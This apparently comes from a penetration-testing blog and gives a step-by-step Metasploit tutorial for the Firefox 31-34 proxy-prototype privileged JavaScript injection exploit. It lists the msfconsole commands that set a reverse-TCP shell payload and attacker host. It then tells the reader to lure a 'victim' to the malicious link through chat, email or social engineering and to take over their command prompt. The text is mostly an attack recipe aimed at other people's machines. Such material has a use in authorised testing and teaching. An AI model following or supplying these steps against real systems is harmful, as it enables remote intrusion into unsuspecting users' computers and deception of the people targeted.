Categories

Archives

Kali Linux, Penetration Testing

Exploit Remote Windows, Linux, OSX PC using Firefox Proxy Prototype Privileged JavaScript Injection

This exploit gains remote code execution on Firefox 31-34 by abusing a bug in the XPConnect component and gaining a reference to the privileged chrome:// window. This exploit requires the user to click anywhere on the page to trigger the vulnerability.

Exploit Targets

Firefox 31 to 34

Windows 7

Linux

Solaris

OSX

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use exploit/multi/browser/firefox_proxy_prototype

msf exploit (firefox_proxy_prototype)>set payload firefox/shell_reverse_tcp

msf exploit (firefox_proxy_prototype)>set lhost 192.168.1.9 (IP of Local Host)

msf exploit (firefox_proxy_prototype)>set srvhost 192.168.1.9

msf exploit (firefox_proxy_prototype)>set uripath /

msf exploit (firefox_proxy_prototype)>exploit

Now an URL you should give to your victim http://192.168.1.9:8080

Send the link of the server to the victim via chat or email or any social engineering technique

Now when the victim opens the following link (http://192.168.1.9:8080) a session will be opened as shown below

Now type session –l to display sessions opened when the victim opens the link

Now the session has opened  type sysinfo to get system information, then type shell to enter into

Victims command prompt.